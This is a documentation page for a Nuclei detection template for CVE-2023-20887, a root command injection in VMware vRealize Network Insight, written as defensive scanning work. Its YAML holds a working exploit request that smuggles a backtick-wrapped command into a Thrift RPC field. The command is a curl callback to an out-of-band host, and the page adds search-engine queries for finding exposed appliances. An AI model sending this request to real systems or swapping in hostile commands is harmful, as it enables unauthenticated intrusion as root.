VMware VRealize Network Insight - Remote Code Execution
ID: CVE-2023-20887
Severity: critical
Author: sinsinology
Tags: cve2023,cve,packetstorm,vmware,rce,msf,vrealize,insight,oast,kev
Description
Section titled “Description”VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of ‘root’ on the appliance. VMWare 6.x version are vulnerable.
YAML Source
Section titled “YAML Source”id: CVE-2023-20887
info: name: VMware VRealize Network Insight - Remote Code Execution author: sinsinology severity: critical description: | VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are vulnerable. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by VMware to mitigate this vulnerability. reference: - https://www.vmware.com/security/advisories/VMSA-2023-0012.html - https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/ - https://github.com/sinsinology/CVE-2023-20887 - http://packetstormsecurity.com/files/173761/VMWare-Aria-Operations-For-Networks-Remote-Command-Execution.html - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-20887 cwe-id: CWE-77 epss-score: 0.9635 epss-percentile: 0.99552 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: vmware product: vrealize_network_insight shodan-query: - title:"VMware vRealize Network Insight" - http.title:"vmware vrealize network insight" - http.title:"vmware aria operations" fofa-query: - title="VMware vRealize Network Insight" - title="vmware aria operations" - title="vmware vrealize network insight" google-query: - intitle:"vmware aria operations" - intitle:"vmware vrealize network insight" tags: cve2023,cve,packetstorm,vmware,rce,msf,vrealize,insight,oast,kevvariables: cmd: "curl {{interactsh-url}}"
http: - raw: - | POST /saas./resttosaasservlet HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-thrift
[1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`{{cmd}}`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}]
matchers-condition: and matchers: - type: word part: body words: - '{"rec":'
- type: word part: header words: - "application/x-thrift"
- type: word part: body negative: true words: - "Provided invalid node Id" - "Invalid nodeId"
- type: status status: - 200# digest: 4b0a00483046022100d0c10c53567917e7d5cbcaa74a548f9f7ed2e52403b3f8346ca6abb2c3a36b300221008cfddef4eb28d8d6ce3947c61b87f0bca02d0a97c0263338ff83de9ee7b4cbd8:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-20887.yaml"